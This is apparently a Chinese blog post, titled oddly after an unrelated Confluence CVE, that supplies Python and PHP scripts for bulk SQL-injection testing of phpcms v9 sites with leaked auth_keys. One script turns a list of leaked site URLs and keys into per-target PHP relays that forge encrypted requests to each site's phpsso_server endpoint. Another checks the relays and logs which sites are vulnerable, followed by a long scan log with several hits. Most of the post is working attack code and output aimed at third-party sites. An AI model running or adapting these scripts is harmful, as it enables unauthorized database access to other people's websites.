Confluence CVE-2023-22515漏洞复现

phpcms auth_key注入漏洞批量检测

前言：

一位基友问我能不能写批检，然后就写了。这个漏洞主要是因为auth_key泄露造成的sql注入漏洞。中专检测的php网上已经有了
我们只需要写个批量检测就行了。

思路：

1.首先你得了解这个漏洞为什么会发生？我该怎么去利用？详细请看这篇文章：https://www.waitalone.cn/phpcmsv9-authkey-sql.html
2.居然已经给出了PHP的中专检测脚本，我们只需要批量替换掉php检测脚本的URL和key。然后生成新的修改好的PHP文件放入一个目录即可
3.然后把生成的目录放入你的PHP环境，进行读取该路径下的所有PHP文件名。然后发送请求判断返回结果是0还是-1即可。（0代表无漏洞，-1代表有漏洞）

正文：

jsqllin.py

import requests
import os
import re

keys=[]
#if os.path.exists('v9.php'):
 #   print('[+]ok v9.php')
##  print('[-]not found v9.php')
  #  exit()

xs=open('saveurl.txt','w')
xs.close()

print('[+]Write url')
dw=open('phpv9_key_leak.txt','r')
for j in dw.readlines():
    ldw="".join(j.split('\n'))
    qe = re.finditer('(http|https)://(www.)?(\w+(\.)?)+', ldw) //正则提取出URL
    for q in qe:
        rc = re.findall("[a-zA-z]+://[^\s]*", str(q))
        for j in rc:
            we = "{}".format(j).replace('>', '').replace("'", '')
            print(we,file=open('saveurl.txt','a'))

wc=[]
lo=open('keys.txt','w')
lo.close()

dkv=open('phpv9_key_leak.txt','r')
for r in dkv.readlines():
    wq="".join(r.split('\n'))
    qe=re.sub('(http|https)://(www.)?(\w+(\.)?)+','',wq)
    qc=re.sub('\|','',str(qe))
    tx=re.findall('[a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9]',str(qc)) //正则提取出key
    for k in tx:
        print(k,file=open('keys.txt','a'))


pds2=[]
wqe2=[]
pds=open('saveurl.txt','r')
wqe=open('keys.txt','r')
for b in pds.readlines():
    pds2.append("".join(b.split('\n')))

for w in wqe.readlines():
    wqe2.append("".join(w.split('\n')))

for x in range(int(len(pds2))): //读取pds（key列表里面的长度）生成对应数量的PHP文件
    os.mknod('scv/{}v9.php'.format(x))

dr=os.listdir('scv') //读取scv目录下所有的PHP文件
for d in range(0,len(pds2)):
    print("""<?php
set_time_limit(0);
$wang_url = '{}'; """.format(pds2[d])+""" 
$auth_key = '{}';""".format(wqe2[d])+""" 
$str = "uid=1" . stripslashes($_GET['id']);
$encode = sys_auth($str, 'ENCODE', $auth_key);
$content = file_get_contents($wang_url . "/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=" . $encode);
echo $content;
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0)
{
    $key_length = 4;
    $key = md5($key);
    $fixedkey = hash('md5', $key);
    $egiskeys = md5(substr($fixedkey, 16, 16));
    $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
    $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
    $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
    $i = 0;
    $result = '';
    $string_length = strlen($string);
    for ($i = 0; $i < $string_length; $i++) {
        $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
    }
    if ($operation == 'ENCODE') {
        return $runtokey . str_replace('=', '', base64_encode($result));
    } else {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    }
}
?>

    """,file=open('scv/{}'.format(dr[d]),'a')) //这个公司会将修改好的逐个写入

jiances.py

import requests
import os
print('[!]请确保你把生成的php文件夹拷贝到你的php环境目录之下，然后请输入目录的路径。我将获取路径下所有的文件进行检测')
user=input('path:')

xj=open('save.txt','w')
xj.close()

def exploitsqllin():
    cs=os.listdir(user) //读取指定列表下的所有文件
    headers={'user-gent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}
    for s in cs: //遍历
        print(s,file=open('save.txt','a')) //写入txt

    dk=open('save.txt','r') 
    for r in dk.readlines():
        wed="".join(r.split('\n'))
        urls='http://127.0.0.1/scv/{}?id=1'.format(wed) //遍历txt之后构造URL
        rq=requests.get(url=urls,headers=headers) //发送请求进行判断
        if '0' in rq.text: 
            print('[-]Not bug {}'.format(rq.url))
        elif '-1' in rq.text:
            print('[+]Bug url {}'.format(rq.url))
exploitsqllin()

图片：

生成的php

检测结果：

漏洞几率不是很大

[-]Not bug http://127.0.0.1/scv/79v9.php?id=1
[-]Not bug http://127.0.0.1/scv/66v9.php?id=1
[-]Not bug http://127.0.0.1/scv/2v9.php?id=1
[+]Bug url http://127.0.0.1/scv/45v9.php?id=1
[-]Not bug http://127.0.0.1/scv/47v9.php?id=1
[-]Not bug http://127.0.0.1/scv/74v9.php?id=1
[-]Not bug http://127.0.0.1/scv/91v9.php?id=1
[-]Not bug http://127.0.0.1/scv/90v9.php?id=1
[-]Not bug http://127.0.0.1/scv/88v9.php?id=1
[-]Not bug http://127.0.0.1/scv/57v9.php?id=1
[+]Bug url http://127.0.0.1/scv/89v9.php?id=1
[-]Not bug http://127.0.0.1/scv/78v9.php?id=1
[-]Not bug http://127.0.0.1/scv/14v9.php?id=1
[-]Not bug http://127.0.0.1/scv/5v9.php?id=1
[-]Not bug http://127.0.0.1/scv/15v9.php?id=1
[-]Not bug http://127.0.0.1/scv/63v9.php?id=1
[-]Not bug http://127.0.0.1/scv/76v9.php?id=1
[-]Not bug http://127.0.0.1/scv/87v9.php?id=1
[+]Bug url http://127.0.0.1/scv/26v9.php?id=1
[-]Not bug http://127.0.0.1/scv/72v9.php?id=1
[+]Bug url http://127.0.0.1/scv/43v9.php?id=1
[-]Not bug http://127.0.0.1/scv/84v9.php?id=1
[-]Not bug http://127.0.0.1/scv/25v9.php?id=1
[+]Bug url http://127.0.0.1/scv/92v9.php?id=1
[-]Not bug http://127.0.0.1/scv/13v9.php?id=1
[-]Not bug http://127.0.0.1/scv/71v9.php?id=1
[-]Not bug http://127.0.0.1/scv/75v9.php?id=1
[-]Not bug http://127.0.0.1/scv/56v9.php?id=1
[-]Not bug http://127.0.0.1/scv/19v9.php?id=1
[+]Bug url http://127.0.0.1/scv/50v9.php?id=1
[-]Not bug http://127.0.0.1/scv/31v9.php?id=1
[-]Not bug http://127.0.0.1/scv/41v9.php?id=1
[-]Not bug http://127.0.0.1/scv/53v9.php?id=1
[-]Not bug http://127.0.0.1/scv/37v9.php?id=1
[-]Not bug http://127.0.0.1/scv/44v9.php?id=1
[-]Not bug http://127.0.0.1/scv/85v9.php?id=1
[-]Not bug http://127.0.0.1/scv/42v9.php?id=1
[+]Bug url http://127.0.0.1/scv/52v9.php?id=1
[+]Bug url http://127.0.0.1/scv/17v9.php?id=1
[-]Not bug http://127.0.0.1/scv/64v9.php?id=1
[-]Not bug http://127.0.0.1/scv/80v9.php?id=1
[-]Not bug http://127.0.0.1/scv/3v9.php?id=1
[-]Not bug http://127.0.0.1/scv/4v9.php?id=1
[-]Not bug http://127.0.0.1/scv/58v9.php?id=1
[-]Not bug http://127.0.0.1/scv/68v9.php?id=1
[-]Not bug http://127.0.0.1/scv/48v9.php?id=1
[-]Not bug http://127.0.0.1/scv/20v9.php?id=1
[+]Bug url http://127.0.0.1/scv/38v9.php?id=1
[-]Not bug http://127.0.0.1/scv/62v9.php?id=1
[-]Not bug http://127.0.0.1/scv/29v9.php?id=1
[-]Not bug http://127.0.0.1/scv/24v9.php?id=1
[-]Not bug http://127.0.0.1/scv/32v9.php?id=1
[-]Not bug http://127.0.0.1/scv/61v9.php?id=1
[-]Not bug http://127.0.0.1/scv/86v9.php?id=1
[-]Not bug http://127.0.0.1/scv/46v9.php?id=1
[-]Not bug http://127.0.0.1/scv/33v9.php?id=1
[-]Not bug http://127.0.0.1/scv/39v9.php?id=1
[-]Not bug http://127.0.0.1/scv/1v9.php?id=1
[-]Not bug http://127.0.0.1/scv/51v9.php?id=1
[-]Not bug http://127.0.0.1/scv/93v9.php?id=1
[-]Not bug http://127.0.0.1/scv/36v9.php?id=1
[-]Not bug http://127.0.0.1/scv/81v9.php?id=1
[-]Not bug http://127.0.0.1/scv/83v9.php?id=1
[-]Not bug http://127.0.0.1/scv/27v9.php?id=1
[-]Not bug http://127.0.0.1/scv/55v9.php?id=1
[-]Not bug http://127.0.0.1/scv/23v9.php?id=1
[-]Not bug http://127.0.0.1/scv/12v9.php?id=1
[-]Not bug http://127.0.0.1/scv/95v9.php?id=1
[-]Not bug http://127.0.0.1/scv/40v9.php?id=1
[-]Not bug http://127.0.0.1/scv/0v9.php?id=1
[-]Not bug http://127.0.0.1/scv/77v9.php?id=1
[-]Not bug http://127.0.0.1/scv/35v9.php?id=1
[-]Not bug http://127.0.0.1/scv/73v9.php?id=1
[-]Not bug http://127.0.0.1/scv/21v9.php?id=1
[-]Not bug http://127.0.0.1/scv/18v9.php?id=1
[-]Not bug http://127.0.0.1/scv/65v9.php?id=1
[-]Not bug http://127.0.0.1/scv/16v9.php?id=1
[-]Not bug http://127.0.0.1/scv/34v9.php?id=1
[-]Not bug http://127.0.0.1/scv/59v9.php?id=1
[+]Bug url http://127.0.0.1/scv/94v9.php?id=1
[-]Not bug http://127.0.0.1/scv/10v9.php?id=1
[-]Not bug http://127.0.0.1/scv/22v9.php?id=1

转载请声明：来之九世的博客

---

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。